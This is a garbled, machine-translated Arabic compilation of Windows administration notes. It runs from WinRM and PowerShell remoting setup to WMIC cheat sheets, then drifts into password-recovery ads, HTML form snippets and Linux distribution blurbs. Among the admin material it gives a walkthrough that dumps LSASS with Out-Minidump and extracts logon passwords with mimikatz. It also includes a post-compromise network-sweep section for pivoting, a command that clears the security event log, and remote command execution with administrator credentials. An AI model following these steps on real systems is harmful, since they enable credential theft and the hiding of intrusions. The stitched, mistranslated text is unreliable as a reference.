Get-ChildItem

للتحقق من أن الكمبيوتر في مجموعة عم



للتحقق من أن الكمبيوتر في مجموعة عمل وأنه تم تثبيت شهادة في مخزن الكمبيوتر. أدخل:
Get-CimInstance –ClassName Win32_ComputerSystem
Get-ChildItem –Path Cert:\LocalMachine\My

تكوين جدار الحماية للسماح حركة مرور هتبس على المنفذ 5986. أدخل:

Netsh AdvFirewall firewall add rule name="WinRM (HTTPS)" 
protocol=TCP dir=in localport=5986 action=allow

عداد المستمع وينرم هتبس، تحتاج إلى كتابة أو نسخ بصمة شهادة من الإخراج السابق. ثم قم بتشغيل هذا الرمز

New-WSManInstance winrm/config/Listener

للتحقق من أن الكمبيوتر في مجموعة عم

 Get-ChildItem -Path Cert:\LocalMachine

بدء جلسة عن بعد لاختبار مستمع هتبس. يركض:

Enter-PSSession –ComputerName Server1 –Credential Server1\Administrator -UseSSL

بعد إدخال كلمة المرور، يتم عرض موجه جلسة العمل عن بعد، مما يؤكد اتصال هتبس ناجحا.

hostname

أولا، للتحقق من أن قائمة تروستيدوستس فارغة، تشغيل:

Get-Item –Path WSMan:\localhost\Client\TrustedHosts

تدخلها هنا هي نفسها التي تستخدم عند إعادة التوجيه. على سبيل المثال،

Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value CoreG2

للتحقق من صحة التهيئة، قم بتشغيل هذا مرة أخرى:

Get-Item –Path WSMan:\localhost\Client\TrustedHosts

دعونا تحقق من أن CoreG2 في مجموعة عمل. أدخل:

Get-CimInstance –ClassName Win32_ComputerSystem | FL

لاختبار الاتصال أدخل:

Enter-PSSession –ComputerName CoreG2 –Credential CoreG2\Administrator

مكن تكوين قائمة تروستيدوستس محليا أو باستخدام نهج 

Enable-WSManCredSSP –Role Client –Delegate

استهدف اسم الكمبيوتر يمكن أن يكون * البدل أو البدل محدود م

Enable-WSManCredSSP –Role Server

إلى وحدة تحكم مجال باسم FS1.

$rdc = New-PSSession –ComputerName FS1

لعرض قائمة الوحدات النمطية على FS1، 

 Get-Module -List -PSSession $rdc | FT ModuleType,Name -AutoSize

لاستيراد وحدة أكتيف ديركتوري من FS1، أدخل:

Import-Module -PSSession $rdc -Name ActiveDirectory

لمعرفة عدد أوامر أد متوفرة الآن على الكمبيوتر المحلي، أدخل:

Get-Command –Module ActiveDirectory | Measure-Object

ستكون هذه الأوامر متوفرة طالما يمكنك الاحتفاظ بسسيون مفتوحة مع الكمبيوتر البعيد.
دعونا نختبر عن بعد عن طريق البحث عن حسابات الكمبيوتر في الدليل. أدخل:

Get-ADComputer –Filter * –SearchBase “OU=file servers,dc=lanztek,dc=local” |
Select Name,ObjectGUID | FT -Autosize

تسيس إلى الموقع غير مسموح به حتى يتم تكوين قواعد التفويض لتعريف المستخدمين والمجموعات التي سيتم السماح لها باستخدام بوابة ويندوز بويرشيل وأجهزة الكمبيوتر التي يمكن للمستخدمين والمجموعات الاتصال بها. لإضافة قاعدة تفويض، اكتب ما يلي:

Add-PswaAuthorizationRule –UserName Lanztek\Administrator 
-ComputerName * -ConfigurationName *

دعونا الاستفادة من وحدة تحكم بويرشيل على شبكة الإنترنت لإنشاء مشاركة شبكة الاتصال على اسم كمبيوتر بعيد FS1. أدخل:

New-SmbShare –name Updates –Path c:\updates –FullAccess lanztek\admin –ReadAcess HelpDesk

للتحقق من الأذونات، قم بتشغيل

Get-SmbShareAccess –Name Updates

أوامر ويندوز مدمجة لتحديد ما إذا كان قد تم الاستيلاء على النظام

wmic process 
wmic process list brief
wmic process list full
wmic startup list full
wmic process list brief /every:1                   CTRL  + C
openfiles /local on
openfiles /query /v
netstat -nao
netstat –s –p icmp
whoami


تجزئة الجداول وأمرت الكائنات المخصصة

Get-ChildItem . | Where-Object { "Contacts", "Desktop" -contains $_.BaseName }
[PSCustomObject] @{ Something = 1; SomethingElse = 2 }
Get-ChildItem . | Select-Object -ExpandProperty FullName

مرة أخرى في بويرشيل 2 الحياة كان مربكا قليلا عند التعامل مع صفائف فارغة ومصفوفات فارغة.

Get-ChildItem . | ForEach-Object { "Never triggered in an empty directory" }
$items = Get-ChildItem .
foreach ($item in $items) {
    "Always triggered in an empty directory"
}


أولا أنا جعل ملف الحمولة النافعة بسيطة فقط للتأكد من أن كل شيء يعمل.

Get-ChildItem c:\ > $env:temp\dirlist.txt
notepad $env:temp\dirlist.txt

منذ البرامج النصية بويرشيل يمكن النووية الجديدة النظام الخاص بك تماما، ويندوز ساجاسيوسلي تعطيل هذه البرامج النصية بشكل افتراضي.

لتغيير هذا، نحتاج إلى تعيين سياسة التنفيذ مؤقتا إلى غير المقيد. بالمناسبة، بعد تشغيل البرنامج النصي يجب تغيير سياسة التنفيذ مرة أخرى إلى مقيدة.

اكتب:
تحرير استراتيجية التنفيذ
استراتيجية التنفيذ يساعد على الحراسة ضد النصوص التي تحكم
لا يمكن الاعتماد عليها. عن طريق تعديل استراتيجية التنفيذ، تعرض نفسك لمخاطر
  الموضحة في موضوع المساعدة about_Execution_Policies. تريد
تغيير استراتيجية التنفيذ؟
[O] نعم [N] لا [S] تعليق [؟] تعليمات (الافتراضي هو "O"):

Set-ExecutionPolicy Unrestricted

ثم قم باستيراد البرنامج النصي بكتابة نقطة متبوعة بالمسار إلى PS1.

C:\Users\vhudson\Documents\Scripts\PowerShell\Out-Minidump.ps1

في المهوس الكلام وهذا ما يعرف باسم "نقطة مصادر" السيناريو وانها طريقة واحدة لاستيراد وظائف في بويرشيل.

سترى فوسيلاد من التحذيرات الأمنية - وهو أمر جيد. ولكن هذا هو السبب الذي قلت لك لفحص السيناريو أولا. لا تنفذ بشكل متعمد نصوص برمجية تجدها عبر الإنترنت. تحقق دائما من التعليمات البرمجية أولا حتى تتمكن من الحصول على بعض فكرة ما يفعله.

اضغط على "r" لتشغيل البرنامج النصي ثم قم بتنفيذ تفريغ الذاكرة

Get-Process lsass | Out-Minidump

تفريغ تفريغ في٪ ويندير٪ System32 \ ولكن نحن بحاجة إلى نقله إلى موقع مختلف حتى نتمكن من مشاهدته. استخدام كمد-كوبيت البند لفعل ثا

Copy-Item .\lsass_516.dmp C:\Users\Vonnie\Documents\Scripts\PowerShell\

عظيم الآن نحن على استعداد لموسيقى الروك.

الوجه الخلفي إلى محطة ميميكاتز وتحميل في تفريغ لساس استولينا في بويرشيل.

sekurlsa::minidump C:\Users\Vonnie\Documents\Scripts\PowerShell\lsass_516.dmp

يجب أن تتحول إلى ملف مينيدومب حتى الآن يمكننا عرض كلمات المرور

الآن لكمة في:

sekurlsa::logonPasswords full

echo $Env:OS
cd HKLM:

للتحقيق في جوانب أخرى من المضيف، يمكن استخدام خطوط أوامر مختلفة لجمع البيانات حول نظام التشغيل. للحصول على قائمة من تكوينات إب، يمكن للمشرفين لنا

Ipconfig –a

يمكن استخدام الأمر نيتش لإدراج حالة جدار الحماية مع:

netsh advfirewall export "firewall.txt"

يمكن استخدام الأمر دريفيركيري لإدراج أي برامج تشغيل قيد الاستخدام والتي يمكن استخدامها لتحديد برامج التشغيل الضارة المحتملة

driverquery /v /fo csv > drvlist.csv

يمكن توجيه كل هذه الأوامر إلى ملف باستخدام عامل التشغيل ">"، على سبيل المثال

C:\>ipconfig /a > ipconfig.txt

process call

معلومات حول الأقراص الصلبة




هذه الأوامر هي الإبلاغ عن برامج البدء

wmic startup
    wmic startup list full
    wmic startup list brief
    wmic startup list system

ملاحظة: هذه الأوامر تنتج قائمة مع جميع البرامج بدء جنبا إلى جنب مع مفاتيح التسجيل الخاصة بهم، وصف البرنامج واسم البرنامج. الخيارات المعروضة أعلاه تعطيك مخرجات مختلفة. مثيرة جدا للاهتمام عند القيام البرمجيات الخبيثة التحليل السلوكي.


wmic /node:machinename startup list full
wmic STARTUP GET Caption, Command, User

ملاحظة: سيؤدي ذلك إلى تغيير بوابة الشبكة


wmic nicconfig where index=9 call enabledhcp

ملاحظة: سيؤدي ذلك إلى تمكين دكب.



wmic service where caption="DHCP Client" call changestartmode "Disabled"
    wmic service where caption="DHCP Client" call changestartmode "Automatic"
    wmic service where caption="DHCP Client" call changestartmode "Manual"

ملاحظة: سيؤدي ذلك إلى تمكين دكب من تعطيل الخدمة تلقائيا أو يدويا.

wmic /node:machinename nicconfig where Index=1 call EnableDHCP

ملاحظة: تغيير إب عن بعد لاستخدام دكب

wmic /node:machinename nicconfig where Index=1 call EnableStatic ("172.16.10.10"), ("255.255.0.0")

مجموعات الأوامر أعلاه تسمح لك التعامل مع كل نوع من معالجة العملية:

 wmic process
    wmic process list brief
    wmic process list full
    wmic process list system

ملاحظة: عمليات أوامر الأوامر المذكورة أعلاه في جهاز ويندوز.

wmic /record:processes.xml process list brief
    wmic /record:processes.xml process list full
    wmic /record:processes.xml process list system

ملاحظة: بعد تشغيل الأمر، يتم تخزين النتائج بتنسيق شمل. هذا هو الشكل الوحيد المدعوم، ولكن هذا هو سجل مفيد من ما كتبته، عند كتابته، والنتائج التي حصلت عليها.

wmic process where name='process_name.exe'
    wmic process where name='process_name.exe'  list brief
    wmic process where name='process_name.exe'  list full
    wmic process where name='process_name.exe'  list system
    wmic process where name='process_name.exe' delete

إيمب وشبكة دنس تجتاح

بعد الاستيلاء على مربع ويندوز يمكنك استخدامه كمحور، ولكن ماذا يحدث إذا كان مربع مقيدة ولا يمكنك تحميل أو تحميل أي أدوات؟ حسنا سوف الأوامر التالية القيام بهذه المهمة




 for /L %I in (1,1,254) DO @ping -n 1 192.168.1.%I | findstr "TTL=128" >> pinglog.txt

ملاحظة: سوف يقوم تسلسل الأمر هذا بإرسال حزمة واحدة فقط والإبلاغ عن هذا الجهاز الذي يحتوي على حقل صفر بلا تل. سيتم تخزين مخرجات الحلقة في ملف يدعى

 pinglog.txt.
for /L %I in (1,1,254) DO @nslookup 192.168.1.%I | find "Name:" >> dnslog.txt

ملاحظة: سيقوم هذا التسلسل الأمر بإجراء بحث دنس العكسي باستخدام ملقم دنس المحلي (يمكن ملاحقة دنس خادم خارجي أيضا). سيتم تخزين الإخراج في ملف سجل يسمى dnslog.txt

 pathping targethost (for a single host only)
    for /L %I in (1,1,254) DO @pingpath -n 192.168.1.%I  >> traceping.txt

ملاحظة: يجمع هذا الأمر بين وظائف بينغ و تراسرت. سوف باثبينغ أولا قائمة عدد من القفزات المطلوبة للوصول إلى العنوان الذي يتم اختبار ثم إرسال عدة بينغ لكل جهاز التوجيه بينك وبين الوجهة. بعد ذلك، فإنه يحسب النتائج على أساس حزم عاد من كل جهاز التوجيه. ونظرا لأن درجة المسير تعرض درجة فقدان الرزم في أي موجه أو وصلة معينة، يمكنك تحديد الموجهات أو الشبكات الفرعية التي قد تواجه مشكلات في الشبكة. لاحظ أن العملية برمتها قد تستهلك 5-10 دقائق لأن العديد من بينغ يتم إرسالها. هناك مفاتيح لتعديل العملية وهذه يمكن أن ينظر إليه عن طريق إدخال "باثبينغ /؟" في موجه الأوامر. سوف تسلسل الأوامر أعلاه خريطة الشبكة بأكملها جنبا إلى جنب مع طرقها (وهذا سيكون مطول).

for /L %I in (1,1,254) DO @echo -Route: %I- >> trace.txt & @pathping -n 1 192.168.1.%I >> trace.txt


ملاحظة: هذا سوف تفعل توجيه تتبع بسيط من الشبكة المحلية بأكملها.


ويندوز اتصال اتصال الشبكة

التعامل مع مستخدمي ويندوز

تعرض الأمثلة التالية قائمة بجميع حسابات المستخدمين للكمبيوتر المحلي (بعض الأوامر تفعل ذلك جنبا إلى جنب مع غيرها من المعلومات المفيدة):


net user
wmic useraccount
wmic useraccount list brief

يعرض المثال التالي معلومات حول حساب المستخدم سوميوسر:

net user someuser



wmic service list brief
netsh int ip delete arpcache

تدقيق السياسات الأمنية

ينطبق على: ويندوز 7 و ويندوز سيرفر 2008 و ويندوز سيرفر 2008 R2 و ويندوز فيستا يعرض معلومات حول ويؤدي وظائف لمعالجة سياسات التدقيق. للحصول على أمثلة حول كيفية استخدام هذا الأمر راجع قسم الأمثلة في كل موضوع.




Auditpol /get /user:{S-1-5-21-1443922412-3030960370-963420232-51} /category:"System","Detailed Tracking","Object Access"




دعونا نلقي نظرة على بعض الاستخدام المثال. للتعرف على الأسماء المستعارة المتاحة، افتح موجه الأوامر واكتب:



wmic alias list brief

بيانات الاعتماد المقدمة

wmic volume list brief

على سبيل المثال، استعلام يقوم فقط بإرجاع مثيلات Win32_process التي تطابق اسم إميت:

wmic process where "name ='notepad.exe'"
wmic process where "name like '%notepad%'"

وميك هو عالم في حد ذاته، معقدة للغاية، وقادرة على قراءة عدة آلاف من الإعدادات على صندوق ويندوز، وتحديث المئات، مرة أخرى على حد سواء محليا وبعد. وهو يتضمن لغة الاستعلام الخاصة بها، يسمى وقل، ل ومي الاستعلام اللغة، مجموعة فرعية من أنسي سكل.

ولكن بونتيفيكاتينغ بما فيه الكفاية! دعونا الحصول على التدريب العملي على. وهنا بعض الأشياء متعة يمكنك القيام به مع وميك التي خدمتنا بشكل جيد للغاية في البحث مكافحة التجسس لدينا:



wmic process [pid] delete

أو، أفضل من ذلك، حاول هذا واحد على لحجم:

wmic process where name='cmd.exe' 

يتيح لك قتل العمليات بالاسم.

wmic process list brief /every:1
wmic useraccount

تحصل على أسماء المستخدمين

wmic qfe
wmic /?
wmic startup list full

ن يعمل قليلا مثل لينكس "بس -

wmic /?:full > wmic_docs_that_stink.txt
wmic /output:c:\os.html os get /format:hform

عد ذلك، افتح c: \ os.html في المتصفح، وانقع في هذا الإخراج الجميل.


 Ooooohhhh. Ahhhhhhh.

للحصول على قائمة أنواع التنسيق التي تدعمها وميك، يمكنك كتابة


wmic [stuff to do] /format /?
wmic process list /format /?

التحديث السابع:

wmic /record:test.xml process list brief

التحديث 8:
قارئ آخر، رغبة عدم الكشف عن هويته، يتحدث عن خيارات تكوين واجهة الشبكة التي تقدمها وميك، مثل:

wmic nicconfig where IPEnabled='true'

هذا سوف تعطيك قائمة من واجهات إب.

أو، لتغيير عنوان إب في سطر الأوامر، يمكنك


wmic nicconfig where Index=1 call EnableStatic ("10.10.10.10"), ("255.255.255.0")

بالنسبة إلى دكب، يمكنك إجراء ذلك:

wmic nicconfig where Index=1 call EnableDHCP

آخر الذي يريد عدم الكشف عن هويته.

netsh /?
wmic process get processid,commandline
wmic process where "name like '%chrome%'" get processid,commandline



sc query type= service


برامج بدء التشغيل

wmic startup list brief

وميك تنفيذ الأوامر عن بعد:

wmic /node:10.0.0.1 /user:Administrator process call create "cmd.exe /c calc.exe"

===============================
wmic process list full | more                    ===
wmic process list full > output.txt            ===
===============================

إذا كان لديك لاستخدام وميك، مما يمكنك الإختراق في طريقك من خلال خلط نتائج


Get-WmiObject -Class Win32_Process | 
    Select-Object Name, @{ 
        Name = 'Owner'
        Expression = { 
            $_.GetOwner().User 
        }
    }



wmic process get Name


للحصول على أصحاب كافة عمليات taskeng.exe (عمليات جدولة المهام ويندوز المهام الفردية):

wmic process where "name='taskeng.exe'" call GetOwner





تاسكيل: يستخدم هذا الأمر لإنهاء العملية أو قتل أي عملية قيد التشغيل في النظام الخاص بك. اكتب قائمة المهام لإدراج كل العملية قيد التشغيل على النظام.
اكتب الأمر التالي لقتل عملية المفكرة من العملية


taskkill /IM notepad.exe

هذا الأمر أغلق بقوة جميع العمليات التي لا تستجيب. (هنا / و حدد القوات لقتل العملية)، اكتب الأمر التالي



taskkill /f /fi

يمكنك أيضا إجراء نفس جمع البيانات عبر الشبكة دون تسجيل الدخول إلى الجهاز البعيد بعد أن تعرف أن لديك بعض بيانات الاعتماد الإدارية التي يقبلها النظام البعيد.

يبدو الأمر نفسه الصادر ضد نظام بعيد في نطاق آخر كما يل

wmic /user:”FOREIGN_DOMAINAdmin” /password:”Password” /node:192.168.33.25 group list brief


على سبيل المثال، يمكنك جمع قائمة من المجموعات على النظام المحلي باستخدام الأمر التالي:


wmic group list brief

بدء تطبيق



wmic process call create “calc.exe”

إنهاء تطبيق



wmic process where name=”calc.exe”

الحصول على قائمة معرفات العملية


wmic process where (Name=’svchost.exe’)

معلومات النظام والإعدادات

يمكنك جمع قائمة متغيرات البيئة (بما في ذلك باث) مع هذا الأمر


wmic environment list

المنتجات / البرامج المثبتة التقرير هتمل منسق



wmic /output:c:product.html product get /format:hform

تشغيل سطح المكتب البعيد عن بعد


Wmic /node:”servername” /user:”user@domain” /password: “password” RDToggle where ServerName=”server
 name” call SetAllowTSConnections 1

الحصول على استخدام محرك الأقراص الخادم عن بعد


WMIC /Node:%%A LogicalDisk Where DriveType=”3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv MORE /E +2 >> SRVSPACE.CSV

الحصول على الرقم التسلسلي بيسي



wmic /node:”HOST” bios get serialnumber


الحصول على رقم المنتج بيسي


wmic /node:”HOST” baseboard get product


البحث عن الأشياء التي تبدأ في التمهيد


wmic STARTUP GET Caption, Command, User


إعادة التشغيل أو إيقاف التشغيلا


wmic os where buildnumber=”2600" call reboot


الحصول على قائمة بدء التشغيل


wmic startup list full


معلومات حول الأقراص الصلبة


wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber


معلومات حول نظام التشغيل


wmic os get bootdevice, buildnumber, caption, freespaceinpagingfiles, installdate, name, systemdrive, windowsdirectory /format:htable > c:osinfo.htm


معلومات حول الملفات


wmic path cim_datafile where “Path=’\windows\system32\wbem\’ and FileSize>1784088” > c:wbemfiles.txt


يمكن الحصول على معلومات المستخدمين والمجموعات المحلية باستخدام هذه الأوامر:

wmic useraccount list
wmic group list
wmic sysaccount list

بالنسبة لوحدات التحكم بالمجال، يجب أن يوفر ذلك قائمة بجميع حسابات المستخدمين والمجموعات في النطاق. إصدار "سيساكونت" يوفر لك حسابات النظام المدمج في وغيرها، وهو أمر مفيد لأي حسابات إضافية قد تكون قد أضيفت من قبل الجذور الخفية.


تحديد أي حسابات النظام المحلي التي تم تمكين (ضيف، وما إلى ذلك)


wmic USERACCOUNT WHERE “Disabled=0 AND LocalAccount=1” GET Name”

عدد عمليات تسجيل الدخول لكل وسيريد



wmic netlogin where (name like “%skodo”) get numberoflogons


الحصول على أسماء النطاقات وعند تعيين الأشخاص ذوي الإعاقة في الحساب على انتهاء الصلاحية


WMIC UserAccount GET name,PasswordExpires /Value


إدارة التصحيح
تحتاج إلى معرفة ما إذا كان هناك أي بقع مفقودة على النظام؟ وميك يمكن أن تساعدك على معرفة مع هذا كومان


wmic qfe list


تشارك
يمكن جمع تعداد جميع الأسهم المحلية باستخدام الأمر


wmic share list


استخدم الأمر التالي لاستخراج قائمة محولات الشبكة ومعلومات عنوان إب:


wmic nicconfig list


الحصول على عنوان ماك:


wmic nic get macaddress


تحديث عنوان إب الثابت:


wmic nicconfig where index=9 call enablestatic(“192.168.16.4”), (“255.255.255.0”)


تغيير بوابة الشبكة:


wmic nicconfig where index=9 call setgateways(“192.168.16.4”, “192.168.16.5”),(1,2)


تمكين دكب


wmic nicconfig where index=9 call enabledhcp


الحصول على قائمة من واجهات إب


wmic nicconfig where IPEnabled=’true’


وميك يمكن سرد كافة الخدمات المثبتة وتكويناتها باستخدام هذا الأمر:


wmic services list


وسيشمل الإخراج الأمر الكامل المستخدم لبدء الخدمة ووصفها المطول.


wmic service where caption=”DHCP Client” call changestartmode “Disabled”


خدمات تقرير عن جهاز بعيد هتمل تنسيق:


wmic /output:c:services.htm /node:server1 service list full / format:htable


الحصول على ستارتمود من الخدمات


Wmic service get caption, name, startmode, state


ميزة أخرى مثيرة للاهتمام من وميك هو قدرته على تسجيل الأمر وقت التشغيل تنفيذها وتكوين وقت التشغيل في كل ملف شمل واحد. قد تبدو الجلسة المسجلة على النحو التالي:


wmic /record:users_list.xml useraccount list


وبطبيعة الحال، منذ لم يتم تصميم وميك كجهاز تسجيل، وهناك بعض المحاذير لاستخدام شمل. أولا، يمكنك فقط استخدام إخراج شمل، لا توجد صيغ أخرى محددة.

سجلات الأحداث

الحصول على نوع معين من الحدث من إيفنتلوغ


wmic ntevent where (message like “%logon%”) list brief


مسح إيفنتلوغ


wmic nteventlog where (description like “%secevent%”) call cleareventlog


استرداد قائمة من التحذيرات والأحداث الخطأ ليس من سجلات النظام أو الأمن

WMIC NTEVENT WHERE “EventType < 3 AND LogFile != ‘System’ AND LogFile != ‘Security’” GET LogFile, SourceName, EventType, Message, TimeGenerated /FORMAT:”htable.xsl”:” datatype = number”:” sortby = EventType” > c:appevent.htm


tasklist

إذا كنت تريد أن تقتل عملية tasklist


إذا كنت تريد أن تقتل عملية، يمكنني استخدام الأمر تاسكيل. فإنه يتطلب بيد من العملية التي نريد أن تقتل. في هذه الحالة، عملية المستكشف لديه بيد من 1532، لذلك لقتله، أستطيع أن اكتب:
حيث يعني / F لإجبار القتل.





tasklist
taskkill /PID 1532 /F

wmic process

أوامر ويندوز مدمجة لتحديد ما إذا كان قد تم الاستيلاء على النظام




wmic process

wmic process list brief

wmic process list full

wmic startup list full

wmic process list brief /every:1

CTRL  + C  

Retrieve passwords

استرجاع كلمات مرور WiFi المنسية
باستخدام WiFi Decryptor Password ، يمكنك استرداد كلمات المرور المفقودة أو المنسية لشبكتك اللاسلكية



برنامج واحد لاستعادة مفاتيح الترخيص المفقودة من برامج Windows و Office و 500+ الشائعة


يمكنك استرداد كلمة مرور Twitter على الفور من أفضل 20 متصفحًا على الويب

البرنامج الوحيد لاستعادة جميع كلمات مرور الشبكة الاجتماعية الخاصة بك من أفضل 20 متصفحًا

يمكنك استرداد كلمة مرور البريد الإلكتروني المنسية على الفور من جميع إصدارات Outlook

استرجع على الفور كلمة مرورك المنسية من أفضل 15 رسلًا فوريًا

يمكنك استرداد كلمة مرور Instagram على الفور من أفضل 20 متصفحًا على الويب

يمكنك استرداد كلمة مرور Google على الفور من أفضل 20 متصفحًا على الويب

البرنامج الوحيد لاستعادة جميع كلمات مرور تسجيل الدخول إلى FTP الخاصة بك من أفضل 20 عميلاً لبروتوكول نقل الملفات

يمكنك استرداد كلمة مرور Facebook على الفور من أفضل 20 متصفحًا على الويب

البرنامج الوحيد لاستعادة جميع كلمات مرور البريد الإلكتروني الخاصة بك من أفضل 10 عملاء بريد إلكتروني و 20+ ...

البرنامج الوحيد لاستعادة جميع كلمات مرور تسجيل الدخول إلى موقع الويب الخاص بك من أفضل 20 متصفحًا

input name="userfile html

input name="userfile




<form action="file-upload.php" method="post" enctype="multipart/form-data">
  Send these files:<br />
  <input name="userfile[]" type="file" /><br />
  <input name="userfile[]" type="file" /><br />
  <input type="submit" value="Send files" />
</form>


input name=password   input  name=username



<form id='login' action='login.php' method='post' accept-charset='UTF-8'>

<fieldset >

<legend>Login</legend>

<input type='hidden' name='submitted' id='submitted' value='1'/>

<label for='username' >UserName*:</label>

<input type='text' name='username' id='username'  maxlength="50"/>
<label for='password' >Password*:</label>

<input type='password' name='password' id='password' maxlength="50" />

<input type='submit' name='Submit' value='Submit' />

</fieldset>

</form>

Bugtraq

مراقبة جميع خدمات النظام وأدوات القرصنة 



Bugtraq -2 Blackwidow عبارة عن توزيعة Linux مفتوحة المصدر ومقرها في أوبونتو وديبيان مع مجموعة PAE kernel 3.2 و 3.4 Hacker حيث ستجد جميع أنواع الأدوات للحصول على أفضل أنظمة سمعية. تم تكييفها للمبتدئين في أمان الكمبيوتر الخاص بالقرصنة الأخلاقية ، وللخبراء في هذا المجال ، ليست مثل التوزيعات الأخرى ، فهي مستقرة وسريعة ، ويمكنك بسهولة مراقبة جميع خدمات النظام وأدوات القرصنة التي تتكيف مع احتياجاتك

Linux Kodachi 2020

Linux Kodachi



Linux Kodachi هو توزيع يستند إلى دبيان ويمكن تشغيله من خلال محرك أقراص DVD أو USB. يقوم التوزيع بتصفية كل حركة مرور الشبكة عبر VPN وشبكة Tor ، مما يحجب موقع شبكة المستخدم. يحاول التوزيع التنظيف من تلقاء نفسه ، مع إزالة آثار استخدامه من الكمبيوتر

توزيع يستند إلى دبيان

المعروف سابقًا باسم BackTrack





هو Kali Linux (المعروف سابقًا باسم BackTrack) هو توزيع يستند إلى دبيان مع مجموعة من أدوات الأمن والطب الشرعي ويتميز بتحديثات الأمان في الوقت المناسب  ودعم بنية ARM  واختيار من أربعة بيئات سطح مكتب شعبية  وترقيات سلسة للإصدارات الأحدث

الطب الشرعي للكمبيوتر

الطب الشرعي للكمبيوتر Parrot Security OS





إن Parrot (المعروف سابقًا باسم Parrot Security OS) هو توزيع يستند إلى نظام الأمن ومقره دبيان ويضم مجموعة من الأدوات المساعدة المصممة لاختبار الاختراق ، والطب الشرعي للكمبيوتر ، والهندسة العكسية ، والقرصنة ، والخصوصية ، وعدم الكشف عن الهوية والتشفير. المنتج ، الذي طورته Frozenbox ، يأتي مع MATE كبيئة سطح المكتب الافتراضية

الشبكة السلكية واللاسلكية

بطاقات الشبكة السلكية واللاسلكية Wifislax




Wifislax هو قرص مضغوط مباشر يستند إلى Slackware يحتوي على مجموعة متنوعة من أدوات الأمن والطب الشرعي تتمثل المطالبة الرئيسية للتوزيع في الشهرة في دمج العديد من برامج تشغيل الشبكات غير الرسمية في نواة Linux  مما يوفر دعمًا مباشرًا لعدد كبير من بطاقات الشبكة السلكية واللاسلكية


مُصمّم لمختبري الاختراق

مُصمّم لمختبري الاختراق BlackArch Linux



BlackArch Linux هو توزيع قائم على نظام Linux ومُصمّم لمختبري الاختراق وباحثي الأمن. يتم توفيره كصورة DVD مباشرة تأتي مع العديد من مديري النوافذ خفيفة الوزن  بما في ذلك Fluxbox و Openbox و Awesome و spectrwm إنه مزود بأكثر من ألف أداة متخصصة لاختبار الاختراق والتحليل الجنائي

نظام تشغيل الهاتف المحمولAndroid-x86

نظام تشغيل الهاتف المحمولAndroid-x86





Android-x86 هي مبادرة غير رسمية لتوصيل نظام تشغيل الهاتف المحمول الذي يعمل بنظام Android من Google لتشغيله على الأجهزة التي تدعمها معالجات Intel و AMD x86 ، بدلاً من رقائق ARM المستندة إلى RISC. بدأ المشروع كسلسلة من التصحيحات على الكود المصدري لنظام أندرويد لتمكين أندرويد من العمل على العديد من أجهزة الكمبيوتر المحمولة الصغيرة وأجهزة الكمبيوتر المحمولة ، وخاصة جهاز ASUS Eee



نظام التشغيل Pearl Linux

نظام التشغيل Pearl Linux

 


نظام التشغيل Pearl Linux هو توزيع يعتمد على Ubuntu. تستخدم Pearl مكونات بيئات سطح المكتب LXDE و Xfce لإنشاء تجربة سطح مكتب تشبه بيئة سطح مكتب OS X من Apple. يدعو المشروع هذا سطح المكتب الهجين PearlDE. نظام التشغيل Linux Linux متاح في العديد من الإصدارات ، بما في ذلك GNOME و MATE و PearlDE

Ubuntu لأول مرة في سبتمبر 2004

تم الإعلان عن إطلاق Ubuntu لأول مرة في سبتمبر 2004




تم الإعلان عن إطلاق Ubuntu لأول مرة في سبتمبر 2004. على الرغم من أن الوافد الجديد نسبيًا على مشهد توزيع Linux ، إلا أن المشروع انطلق بشكل لا مثيل له من قبل ، حيث سرعان ما امتلأت قوائمه البريدية بمناقشات المستخدمين المتحمسين والمطورين المتحمسين. في السنوات التي تلت ذلك ، نمت Ubuntu لتصبح توزيع Linux الأكثر شعبية على سطح المكتب ، وقد ساهمت بشكل كبير في تطوير نظام تشغيل مجاني وسهل الاستخدام لسطح المكتب يمكنه التنافس جيدًا مع أي نظام خاص متاح في السوق.

ما هو السبب وراء النجاح المذهل لأوبونتو؟ أولاً ، تم إنشاء المشروع بواسطة مارك شاتلورث ، الملياردير الجنوب أفريقي الجذاب ، وهو مطور سابق لشركة دبيان وسائح الفضاء الثاني في العالم ، الذي تقوم شركته ، وهي شركة Isle of Canonical Ltd التي تتخذ من جزيرة آيل أوف مان ، بتمويلها حالياً. ثانياً ، تعلمت أوبونتو من أخطاء مشاريع أخرى مماثلة وتجنبتها من البداية - فقد أنشأت بنية أساسية ممتازة قائمة على الويب مع وثائق على غرار Wiki ، ومنشأة إبداعية للإبلاغ عن الأخطاء ، ونهج احترافي للمستخدمين النهائيين. وثالثا ، بفضل مؤسسها الأثرياء ، تمكنت Ubuntu من شحن أقراص CD مجانية لجميع المستخدمين المهتمين ، مما ساهم في الانتشار السريع للتوزيع.

على الجانب التقني من الأشياء ، تعتمد Ubuntu على Debian "Sid" (فرع Debian's Unstable) ، ولكن مع بعض الحزم البارزة ، مثل GNOME و Firefox و LibreOffice ، تم تحديثها إلى أحدث إصداراتها. يستخدم إصدارًا مخصصًا للغاية من بيئة سطح مكتب جنوم. يحتوي على جدول زمني للتنبؤ به مدته 6 أشهر ، مع إصدار دعم طويل الأجل (LTS) معتمد مع تحديثات الأمان لمدة خمس سنوات ، اعتمادًا على الإصدار (يتم دعم الإصدار غير المتعلق بـ LTS لمدة تسعة أشهر). تشمل الميزات الخاصة الأخرى في Ubuntu قرص DVD مباشرًا قابل للتثبيت ، وأعمالًا فنية إبداعية وسطح مكتب ، ومساعدة ترحيل لمستخدمي Windows ، ودعمًا لأحدث التقنيات ، مثل تأثيرات سطح المكتب ثلاثية الأبعاد ، والتثبيت السهل لبرامج تشغيل الأجهزة الاحتكارية لبطاقات رسومات ATI و NVIDIA والشبكات اللاسلكية والدعم عند الطلب لبرامج ترميز الوسائط غير المجانية أو المرخصة ببراءة

يتمتع FreeBSD

طورت FreeBSD سمعة كونها نظام تشغيل سريع وعالي الأداء ومستقر للغاية 



